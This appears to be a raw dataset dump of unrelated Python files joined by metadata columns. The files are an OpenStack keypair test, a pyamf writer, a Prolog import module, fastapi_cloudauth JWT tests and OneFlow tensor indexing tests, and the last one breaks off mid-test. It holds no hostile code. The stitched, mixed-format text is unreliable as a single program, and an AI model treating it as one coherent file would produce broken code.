    @mock.patch.object(sdk_utils, 'supports_microversion', return_value=False)
    def test_keypair_show_with_user_pre_v210(self, sm_mock):
        # --user must be rejected before microversion 2.10.
        arglist = [
            '--user', identity_fakes.user_name,
            self.keypair.name,
        ]
        verifylist = [
            ('user', identity_fakes.user_name),
            ('name', self.keypair.name)
        ]
        parsed_args = self.check_parser(self.cmd, arglist, verifylist)
        ex = self.assertRaises(
            exceptions.CommandError,
            self.cmd.take_action,
            parsed_args)
        self.assertIn(
            '--os-compute-api-version 2.10 or greater is required', str(ex))
| 32.337179
| 79
| 0.603021
| 2,819
| 25,223
| 5.160695
| 0.086556
| 0.05444
| 0.04523
| 0.036569
| 0.847058
| 0.817432
| 0.786225
| 0.760654
| 0.750825
| 0.738177
| 0
| 0.005569
| 0.295246
| 25,223
| 779
| 80
| 32.378691
| 0.812838
| 0.050549
| 0
| 0.660473
| 0
| 0
| 0.062053
| 0.023834
| 0
| 0
| 0
| 0
| 0.116554
| 1
| 0.055743
| false
| 0
| 0.02027
| 0
| 0.091216
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
65df0cea78bb12eea944b23b080faf9370bf7b47
| 151
|
py
|
Python
|
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
vpbuf/examples/uno/rel1/python/vp_uno/__init__.py
|
markraley/versioned-polymorphic-buffers
|
c2f0424f05013cfcaf5a55464846e9bcf26818e2
|
[
"MIT"
] | null | null | null |
from pyamf import amf3
def write_int(ver, f, payload):
    """Write *payload* to the AMF stream *f* as an integer.

    *ver* is accepted for a uniform writer signature but is not used here.
    """
    f.writeInteger(payload)
def write_str(ver, f, payload):
    """Write *payload* to the AMF stream *f* as a string.

    *ver* is accepted for a uniform writer signature but is not used here.
    """
    f.writeString(payload)
| 18.875
| 32
| 0.688742
| 22
| 151
| 4.636364
| 0.590909
| 0.156863
| 0.215686
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008333
| 0.205298
| 151
| 7
| 33
| 21.571429
| 0.841667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
02b646bf1df14509751ad744af724a5137d7ee6e
| 244
|
py
|
Python
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 80
|
2020-10-20T14:25:28.000Z
|
2022-02-27T14:29:24.000Z
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 8
|
2020-10-20T14:16:55.000Z
|
2021-03-19T13:51:54.000Z
|
src/pylo/engines/prolog/__init__.py
|
olympus112/pylo2
|
cfbe29d1c2f8eead0193ee2d024090555407c528
|
[
"MIT"
] | 7
|
2020-10-21T21:01:31.000Z
|
2021-09-29T09:57:14.000Z
|
try:
from .GnuProlog import GNUProlog
except Exception:
pass
try:
from .SWIProlog import SWIProlog
except Exception:
pass
try:
from .XSBProlog import XSBProlog
except Exception:
pass
from .prologsolver import Prolog
| 13.555556
| 36
| 0.729508
| 28
| 244
| 6.357143
| 0.392857
| 0.117978
| 0.320225
| 0.247191
| 0.292135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.229508
| 244
| 17
| 37
| 14.352941
| 0.946809
| 0
| 0
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.230769
| 0.307692
| 0
| 0.307692
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
02d485c604f71fd56d535ce8450d9d0081ccfec1
| 8,000
|
py
|
Python
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 198
|
2020-08-05T06:40:58.000Z
|
2022-03-26T06:54:24.000Z
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 56
|
2020-08-26T11:41:49.000Z
|
2022-02-12T22:55:53.000Z
|
tests/test_verification.py
|
jleclanche/fastapi-cloudauth
|
9c098f91f46d9d927e1f10b82b80340951d0b1f2
|
[
"MIT"
] | 36
|
2020-08-02T06:19:34.000Z
|
2022-03-07T21:02:54.000Z
|
from datetime import datetime, timedelta
import pytest
from fastapi import HTTPException
from fastapi.security import HTTPAuthorizationCredentials
from jose import jwt
from starlette.status import HTTP_401_UNAUTHORIZED
from fastapi_cloudauth import messages
from fastapi_cloudauth.verification import (
JWKS,
JWKsVerifier,
Operator,
ScopedJWKsVerifier,
)
from .helpers import _assert_verifier, _assert_verifier_no_error
@pytest.mark.unittest
def test_malformed_token_handling():
    """A malformed bearer token raises 401, or returns falsy when auto_error is off."""
    bad_creds = HTTPAuthorizationCredentials(
        scheme="a", credentials="malformed-token",
    )

    # Plain verifier, strict mode: both entry points raise.
    strict = JWKsVerifier(jwks=JWKS(keys=[]))
    for call in (strict._get_publickey, strict.verify_token):
        with pytest.raises(HTTPException):
            call(bad_creds)

    # Plain verifier, lenient mode: both entry points return falsy.
    lenient = JWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)
    assert not lenient._get_publickey(bad_creds)
    assert not lenient.verify_token(bad_creds)

    # Scoped verifier, strict mode.
    strict_scoped = ScopedJWKsVerifier(jwks=JWKS(keys=[]))
    for call in (strict_scoped._verify_scope, strict_scoped.verify_token):
        with pytest.raises(HTTPException):
            call(bad_creds)

    # Scoped verifier, lenient mode.
    lenient_scoped = ScopedJWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)
    assert not lenient_scoped._verify_scope(bad_creds)
    assert not lenient_scoped.verify_token(bad_creds)
@pytest.mark.unittest
def test_verify_scope_exeption(mocker):
    """Scope checks: trivial pass, non-string claim raises, auto_error=False is falsy."""
    scope_key = "dummy key"
    http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)

    # With no required scope, verification is trivially true.
    mocker.patch(
        "fastapi_cloudauth.verification.jwt.get_unverified_claims",
        return_value={"dummy key": "read:test"},
    )
    checker = ScopedJWKsVerifier(
        jwks=JWKS(keys=[]), scope_key=scope_key, scope_name=None
    )
    assert checker._verify_scope(http_auth)

    # A non-string/list claim value is an invalid incoming scope format.
    mocker.patch(
        "fastapi_cloudauth.verification.jwt.get_unverified_claims",
        return_value={"dummy key": 100},
    )
    checker = ScopedJWKsVerifier(
        jwks=JWKS(keys=[]), scope_key=scope_key, scope_name=["read:test"]
    )
    with pytest.raises(HTTPException):
        checker._verify_scope(http_auth)

    # Same invalid format with auto_error off: falsy result, no raise.
    checker = ScopedJWKsVerifier(
        jwks=JWKS(keys=[]),
        scope_key=scope_key,
        scope_name=["read:test"],
        auto_error=False,
    )
    assert not checker._verify_scope(http_auth)
@pytest.mark.unittest
@pytest.mark.parametrize(
    "scopes", ["xxx:xxx yyy:yyy", ["xxx:xxx", "yyy:yyy"]],
)
def test_scope_match_all(mocker, scopes):
    """Default (all) operator: the token must hold every required API scope."""
    scope_key = "dummy key"
    http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)
    # check scope logic
    mocker.patch(
        "fastapi_cloudauth.verification.jwt.get_unverified_claims",
        return_value={"dummy key": scopes},
    )
    jwks = JWKS(keys=[])

    # (required API scopes, expected result) — token holds xxx:xxx and yyy:yyy.
    cases = [
        (["xxx:xxx"], True),                          # api scope < user scope
        (["xxx:xxx", "yyy:yyy"], True),               # equal, in order
        (["yyy:yyy", "xxx:xxx"], True),               # equal, disorder
        (["yyy:yyy", "xxx:xxx", "zzz:zzz"], False),   # api scope > user scope
    ]
    for required, expected in cases:
        checker = ScopedJWKsVerifier(
            scope_name=required,
            jwks=jwks,
            scope_key=scope_key,
            auto_error=False,
        )
        assert bool(checker._verify_scope(http_auth)) == expected
@pytest.mark.unittest
@pytest.mark.parametrize(
    "scopes", ["xxx:xxx yyy:yyy", ["xxx:xxx", "yyy:yyy"]],
)
def test_scope_match_any(mocker, scopes):
    """Operator._any: one overlapping scope between token and API is enough."""
    scope_key = "dummy key"
    http_auth = HTTPAuthorizationCredentials(scheme="a", credentials="dummy-token",)
    # check scope logic
    mocker.patch(
        "fastapi_cloudauth.verification.jwt.get_unverified_claims",
        return_value={"dummy key": scopes},
    )
    jwks = JWKS(keys=[])

    # (required API scopes, expected result) — token holds xxx:xxx and yyy:yyy.
    cases = [
        (["xxx:xxx"], True),                          # api scope < user scope
        (["xxx:xxx", "yyy:yyy"], True),               # equal, in order
        (["yyy:yyy", "xxx:xxx"], True),               # equal, disorder
        (["yyy:yyy", "xxx:xxx", "zzz:zzz"], True),    # superset, overlap exists
        (["zzz:zzz"], False),                         # disjoint scopes
    ]
    for required, expected in cases:
        checker = ScopedJWKsVerifier(
            scope_name=required,
            op=Operator._any,
            jwks=jwks,
            scope_key=scope_key,
            auto_error=False,
        )
        assert bool(checker._verify_scope(http_auth)) == expected
@pytest.mark.unittest
def test_verify_token():
    """Claim checks: valid, expired, future-issued, and malformed tokens."""
    strict = JWKsVerifier(jwks=JWKS(keys=[]))
    lenient = JWKsVerifier(jwks=JWKS(keys=[]), auto_error=False)

    def make_token(exp_offset, iat_offset=timedelta()):
        # HS256-signed token; only the exp/iat claims matter to _verify_claims.
        return jwt.encode(
            {
                "sub": "dummy-ID",
                "exp": datetime.utcnow() + exp_offset,
                "iat": datetime.utcnow() + iat_offset,
            },
            "dummy_secret",
            headers={"alg": "HS256", "typ": "JWT", "kid": "dummy-kid"},
        )

    # Correct token: both verifiers accept the claims without raising.
    token = make_token(timedelta(hours=10))
    strict._verify_claims(HTTPAuthorizationCredentials(scheme="a", credentials=token))
    lenient._verify_claims(
        HTTPAuthorizationCredentials(scheme="a", credentials=token)
    )

    # Token expired 10h ago -> 401 with NOT_VERIFIED detail.
    token = make_token(timedelta(hours=-10))
    e = _assert_verifier(token, strict)
    assert e.status_code == HTTP_401_UNAUTHORIZED and e.detail == messages.NOT_VERIFIED
    _assert_verifier_no_error(token, lenient)

    # Token issued 10h in the future -> 401 with NOT_VERIFIED detail.
    token = make_token(timedelta(hours=10), timedelta(hours=10))
    e = _assert_verifier(token, strict)
    assert e.status_code == HTTP_401_UNAUTHORIZED and e.detail == messages.NOT_VERIFIED
    _assert_verifier_no_error(token, lenient)

    # Structurally invalid token (header segment only) -> NOT_AUTHENTICATED.
    token = make_token(timedelta(hours=10)).split(".")[0]
    e = _assert_verifier(token, strict)
    assert (
        e.status_code == HTTP_401_UNAUTHORIZED
        and e.detail == messages.NOT_AUTHENTICATED
    )
    _assert_verifier_no_error(token, lenient)
| 30.534351
| 88
| 0.6555
| 914
| 8,000
| 5.482495
| 0.122538
| 0.043105
| 0.038914
| 0.064259
| 0.86829
| 0.854919
| 0.832169
| 0.790261
| 0.767511
| 0.738176
| 0
| 0.00645
| 0.22475
| 8,000
| 261
| 89
| 30.651341
| 0.801516
| 0.05325
| 0
| 0.61244
| 0
| 0
| 0.102992
| 0.029653
| 0
| 0
| 0
| 0
| 0.119617
| 1
| 0.023923
| false
| 0
| 0.043062
| 0
| 0.066986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02d586abc0fb8ce87c143a54d0c89a27cf9bc60c
| 17,478
|
py
|
Python
|
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/test/tensor/test_tensor_indexing.py
|
Panlichen/oneflow
|
ad93c69c9932e5515aa31fb7f157073708810a3d
|
[
"Apache-2.0"
] | 1
|
2021-12-15T02:14:49.000Z
|
2021-12-15T02:14:49.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from oneflow.test_utils.test_util import GenArgList
from collections import OrderedDict
from oneflow.test_utils.automated_test_util import *
import numpy as np
import oneflow as flow
import oneflow.unittest
def _test_numpy_scalar_indexing(test_case, numpy_x, np_scalar):
    """Basic getitem with numpy integer scalars must match numpy's result.

    np_scalar is a numpy integer type (e.g. np.int32) so the indices are
    numpy scalars rather than Python ints.
    """
    x = flow.Tensor(numpy_x)
    pair = (np_scalar(0), np_scalar(1))
    # The original exercised the same scalar tuple via three syntactically
    # identical spellings; they evaluate to the same index object.
    for idx in [np_scalar(1), np_scalar(-2), pair, pair, pair]:
        test_case.assertTrue(np.allclose(numpy_x[idx], x[idx].numpy()))
def _test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar):
    """Advanced (list) getitem with numpy integer scalars must match numpy.

    np_scalar is a numpy integer type (e.g. np.int32) used to build the
    index values, exercising non-Python-int index elements.
    """
    x = flow.Tensor(numpy_x)
    # advance indexing
    # One index list on the leading axis: selects rows 0 and 1.
    test_case.assertTrue(
        np.allclose(
            numpy_x[[np_scalar(0), np_scalar(1)]],
            x[[np_scalar(0), np_scalar(1)]].numpy(),
        )
    )
    # Two index lists (a tuple of lists): element pairs (0,1) and (1,0).
    test_case.assertTrue(
        np.allclose(
            numpy_x[[np_scalar(0), np_scalar(1)], [np_scalar(1), np_scalar(0)]],
            x[[np_scalar(0), np_scalar(1)], [np_scalar(1), np_scalar(0)]].numpy(),
        )
    )
    # Nested index list — presumably interpreted as a (3, 2) index array on
    # the leading axis, mirroring numpy's behavior; verify against numpy.
    test_case.assertTrue(
        np.allclose(
            numpy_x[
                [
                    [np_scalar(0), np_scalar(1)],
                    [np_scalar(0), np_scalar(1)],
                    [np_scalar(1), np_scalar(0)],
                ]
            ],
            x[
                [
                    [np_scalar(0), np_scalar(1)],
                    [np_scalar(0), np_scalar(1)],
                    [np_scalar(1), np_scalar(0)],
                ]
            ].numpy(),
        )
    )
def _test_basic_slice(test_case, numpy_x):
    """Basic getitem on a flow tensor must match numpy exactly.

    Covers integer, negative, tuple, None (newaxis), bool, slice,
    stepped/over-long slice, Ellipsis indexing, and combinations.
    """
    x = flow.tensor(numpy_x)
    # Integer and tuple indexing; the doubled parentheses below are
    # syntactically identical spellings of the same tuple index.
    test_case.assertTrue(np.allclose(numpy_x[1], x[1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[-2], x[-2].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[0, 1], x[0, 1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[(0, 1)], x[(0, 1)].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[((0, 1))], x[((0, 1))].numpy()))
    # None inserts a new axis; a bool scalar acts as a 0/1-length new axis.
    test_case.assertTrue(np.allclose(numpy_x[None], x[None].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[True], x[True].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[1, None], x[1, None].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[1, None, 1], x[1, None, 1].numpy()))
    test_case.assertTrue(
        np.allclose(numpy_x[1, None, None, 1], x[1, None, None, 1].numpy())
    )
    # Slices, including negative bounds and out-of-range stop/step.
    test_case.assertTrue(np.allclose(numpy_x[:], x[:].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[:1], x[:1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[0:1], x[0:1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[-2:-1], x[-2:-1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[2:100:200], x[2:100:200].numpy()))
    # Ellipsis combined with slices and integers.
    test_case.assertTrue(np.allclose(numpy_x[0:2, ...], x[0:2, ...].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[0:2, ..., 1], x[0:2, ..., 1].numpy()))
    test_case.assertTrue(
        np.allclose(numpy_x[0:2, ..., 1, 1], x[0:2, ..., 1, 1].numpy())
    )
    test_case.assertTrue(np.allclose(numpy_x[0:4:2, ...], x[0:4:2, ...].numpy()))
    test_case.assertTrue(
        np.allclose(numpy_x[0:2, None, ..., True], x[0:2, None, ..., True].numpy())
    )
    test_case.assertTrue(
        np.allclose(numpy_x[None, ..., 0:4:2, True], x[None, ..., 0:4:2, True].numpy())
    )
    # Leading bool scalars (False yields an empty leading dimension).
    test_case.assertTrue(np.allclose(numpy_x[False, ...], x[False, ...].numpy()))
    test_case.assertTrue(
        np.allclose(numpy_x[False, True, ...], x[False, True, ...].numpy())
    )
    test_case.assertTrue(
        np.allclose(numpy_x[True, ..., False, True], x[True, ..., False, True].numpy())
    )
    test_case.assertTrue(
        np.allclose(
            numpy_x[True, None, ..., False, True],
            x[True, None, ..., False, True].numpy(),
        )
    )
    test_case.assertTrue(
        np.allclose(
            numpy_x[True, 1, ..., False, True], x[True, 1, ..., False, True].numpy()
        )
    )
def _test_advanced_indexing(test_case, numpy_x):
    """Advanced getitem (index lists, index tensors, bool masks) vs numpy.

    All expectations are defined by numpy's behavior on the same index.
    """
    x = flow.tensor(numpy_x)
    # Index lists of increasing nesting depth.
    test_case.assertTrue(np.allclose(numpy_x[[0, 1]], x[[0, 1]].numpy()))
    test_case.assertTrue(
        np.allclose(numpy_x[[0, 1], [1, 0]], x[[0, 1], [1, 0]].numpy())
    )
    test_case.assertTrue(
        np.allclose(
            numpy_x[[[0, 1], [0, 1], [1, 0]]], x[[[0, 1], [0, 1], [1, 0]]].numpy()
        )
    )
    test_case.assertTrue(np.allclose(numpy_x[[[0], [1]]], x[[[0], [1]]].numpy()))
    # Mixed-shape nested lists — presumably broadcast per numpy's advanced
    # indexing rules; the numpy side defines the expected result.
    test_case.assertTrue(
        np.allclose(
            numpy_x[[[[0], [1]], [[0], [1]], [0, 1]]],
            x[[[[0], [1]], [[0], [1]], [0, 1]]].numpy(),
        )
    )
    test_case.assertTrue(
        np.allclose(
            numpy_x[[[[0, 1], [1, 1]], [[0, 0], [1, 1]], [0, 1]]],
            x[[[[0, 1], [1, 1]], [[0, 0], [1, 1]], [0, 1]]].numpy(),
        )
    )
    # Tensor index
    test_case.assertTrue(
        np.allclose(
            numpy_x[np.array([0, 1]), np.array([1, 0])],
            x[flow.tensor([0, 1]), flow.tensor([1, 0])].numpy(),
        )
    )
    test_case.assertTrue(
        np.allclose(
            numpy_x[:, np.array([[0, 1], [1, 1]]), np.array([[1, 0], [1, 1]])],
            x[:, flow.tensor([[0, 1], [1, 1]]), flow.tensor([[1, 0], [1, 1]]),].numpy(),
        )
    )
    # mask tensor index
    # 2-d mask over the first two axes, with thresholds that select all,
    # some, and none of the elements.
    mask = np.random.rand(numpy_x.shape[0], numpy_x.shape[1]).astype(np.float32)
    y = flow.tensor(mask)
    test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 0.5, 1], x[y > 0.5, 1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 0], x[y > 0].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 0, 1], x[y > 0, 1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 1], x[y > 1].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 1, 1], x[y > 1, 1].numpy()))
    # Full-shape mask covering every element.
    mask = np.random.rand(*numpy_x.shape).astype(np.float32)
    y = flow.tensor(mask)
    test_case.assertTrue(np.allclose(numpy_x[mask > 0.5], x[y > 0.5].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 0], x[y > 0].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[mask > 1], x[y > 1].numpy()))
def _test_advanced_indexing_array(test_case, numpy_x, dtype):
    """Advanced getitem with numpy index *arrays* of the given integer dtype.

    Value equality is asserted where numpy and flow agree elementwise;
    the broadcast cases at the end compare result shapes only.
    """
    x = flow.tensor(numpy_x)
    idx = np.array([0, 1], dtype=dtype)
    test_case.assertTrue(np.allclose(numpy_x[idx], x[idx].numpy()))
    idx1 = np.array([0, 1], dtype=dtype)
    idx2 = np.array([1, 0], dtype=dtype)
    test_case.assertTrue(np.allclose(numpy_x[idx1, idx2], x[idx1, idx2].numpy()))
    # 2-d index array used on one, two, and three axes.
    idx = np.array([[0, 1], [0, 1], [1, 0]], dtype=dtype)
    test_case.assertTrue(np.allclose(numpy_x[idx, :, :], x[idx, :, :].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[idx, idx, :], x[idx, idx, :].numpy()))
    test_case.assertTrue(np.allclose(numpy_x[idx, idx, idx], x[idx, idx, idx].numpy()))
    # Index arrays of different shapes: only the broadcast result shape is
    # compared here, not the values.
    idx1 = np.array([[1, 0, 1], [1, 1, 0]])
    idx2 = np.array([[0], [1]])
    test_case.assertTrue(
        np.allclose(numpy_x[:, idx1, :, idx2].shape, x[:, idx1, :, idx2].shape)
    )
    test_case.assertTrue(
        np.allclose(numpy_x[:, idx1, 1, idx2].shape, x[:, idx1, 1, idx2].shape)
    )
    test_case.assertTrue(
        np.allclose(numpy_x[idx1, :, idx2, :].shape, x[idx1, :, idx2, :].shape)
    )
    test_case.assertTrue(
        np.allclose(numpy_x[:, idx1, idx2, :].shape, x[:, idx1, idx2, :].shape)
    )
def _test_combining_indexing(test_case, numpy_x):
    """Mixed basic + advanced indexing must agree with numpy.

    Each case is the explicit index tuple that the original subscript
    syntax desugars to (slice/Ellipsis objects spelled out).
    """
    x = flow.tensor(numpy_x)
    cases = [
        ([0, 1], slice(1, 2), [1, 0]),          # x[[0, 1], 1:2, [1, 0]]
        (slice(None), [0, 1], [1, 0]),          # x[:, [0, 1], [1, 0]]
        (slice(None), [0, 1], 1),               # x[:, [0, 1], 1]
        (Ellipsis, [0, 1], 1, [1, 0]),          # x[..., [0, 1], 1, [1, 0]]
    ]
    for idx in cases:
        test_case.assertTrue(np.allclose(numpy_x[idx], x[idx].numpy()))
def _test_mask_getitem(test_case, numpy_x):
    """Boolean-mask reads must match numpy for full-shape and 1-d masks."""
    x = flow.tensor(numpy_x)

    # Mask covering every element; 0.5 selects some, 1.0 selects none.
    mask = np.random.rand(*numpy_x.shape).astype(np.float32)
    y = flow.tensor(mask)
    for threshold in (0.5, 1.0):
        test_case.assertTrue(
            np.allclose(numpy_x[mask > threshold], x[y > threshold].numpy())
        )

    # Mask along the leading dimension only, alone and combined with an int.
    mask = np.random.rand(numpy_x.shape[0]).astype(np.float32)
    y = flow.tensor(mask)
    for threshold in (0.5, 1.0):
        test_case.assertTrue(
            np.allclose(numpy_x[mask > threshold], x[y > threshold].numpy())
        )
    for threshold in (0.5, 1.0):
        test_case.assertTrue(
            np.allclose(numpy_x[mask > threshold, 1], x[y > threshold, 1].numpy())
        )
def _test_mask_setitem(test_case, numpy_x):
    """Boolean-mask setitem must mutate the flow tensor exactly like numpy.

    Note: numpy_x is mutated in place, so statement order matters — each
    check compares the cumulative state of both sides.
    """
    x = flow.tensor(numpy_x)
    # mask tensor index
    mask = np.random.rand(*numpy_x.shape).astype(np.float32)
    y = flow.tensor(mask)
    # broadcast set: a single scalar fills every selected element
    x[y > 0.5] = 1.0
    numpy_x[mask > 0.5] = 1.0
    test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
    # elementwise set: one update value per selected element
    update = np.random.randn((mask > 0.5).sum()).astype(np.float32)
    tensor_update = flow.tensor(update)
    x[y > 0.5] = tensor_update
    numpy_x[mask > 0.5] = update
    test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
    # empty mask: assigning through a mask that selects nothing is a no-op
    x[y > 1.0] = 1.0
    numpy_x[mask > 1.0] = 1.0
    test_case.assertTrue(np.allclose(numpy_x, x.numpy()))
def _test_list_indexing_using_scalar_tensor(test_case, dtype):
    """A 0-dim integer flow tensor must index a numpy array like a plain int."""
    y = np.random.randint(0, 100, size=100)
    for position, expected in enumerate(y):
        scalar = flow.tensor(position, dtype=dtype)
        test_case.assertEqual(expected, y[scalar])
@flow.unittest.skip_unless_1n1d()
class TestTensorIndexing(flow.unittest.TestCase):
    """Single-device getitem/setitem tests comparing flow tensors to numpy.

    Most tests delegate to the module-level _test_* helpers, feeding them
    3-d and 4-d arange inputs of several shapes.
    """

    def test_basic_slice(test_case):
        numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
        _test_basic_slice(test_case, numpy_x)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_basic_slice(test_case, numpy_x)
        numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
        _test_basic_slice(test_case, numpy_x)

    def test_advanced_indexing(test_case):
        numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
        _test_advanced_indexing(test_case, numpy_x)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_advanced_indexing(test_case, numpy_x)
        numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
        _test_advanced_indexing(test_case, numpy_x)

    def test_advanced_indexing_array(test_case):
        # Each shape is exercised with both int32 and int64 index arrays.
        numpy_x = np.arange(0, 60, 1).reshape([3, 2, 2, 5]).astype(np.float32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int64)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int64)
        numpy_x = np.arange(0, 720, 1).reshape([5, 8, 9, 2]).astype(np.float32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int32)
        _test_advanced_indexing_array(test_case, numpy_x, np.int64)

    def test_combining_indexing(test_case):
        numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
        _test_combining_indexing(test_case, numpy_x)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_combining_indexing(test_case, numpy_x)
        numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
        _test_combining_indexing(test_case, numpy_x)

    def test_numpy_scalar_indexing(test_case):
        # Basic slicing supports all four numpy int widths...
        for np_scalar in [np.int8, np.int16, np.int32, np.int64]:
            numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
            _test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
            numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
            _test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
            numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
            _test_numpy_scalar_indexing(test_case, numpy_x, np_scalar)
        # ...but advanced indexing is only tested with int32/int64.
        # TODO: add np.int16 when advance indexing supports np.int16 mapping
        for np_scalar in [np.int32, np.int64]:
            numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
            _test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)
            numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
            _test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)
            numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
            _test_numpy_scalar_advance_indexing(test_case, numpy_x, np_scalar)

    def test_mask_getitem(test_case):
        numpy_x = np.arange(0, 60, 1).reshape([3, 4, 5]).astype(np.float32)
        _test_mask_getitem(test_case, numpy_x)
        numpy_x = np.arange(0, 360, 1).reshape([3, 4, 5, 6]).astype(np.float32)
        _test_mask_getitem(test_case, numpy_x)
        numpy_x = np.arange(0, 720, 1).reshape([8, 9, 10]).astype(np.float32)
        _test_mask_getitem(test_case, numpy_x)
        # Boolean index lists, alone and combined with other indices.
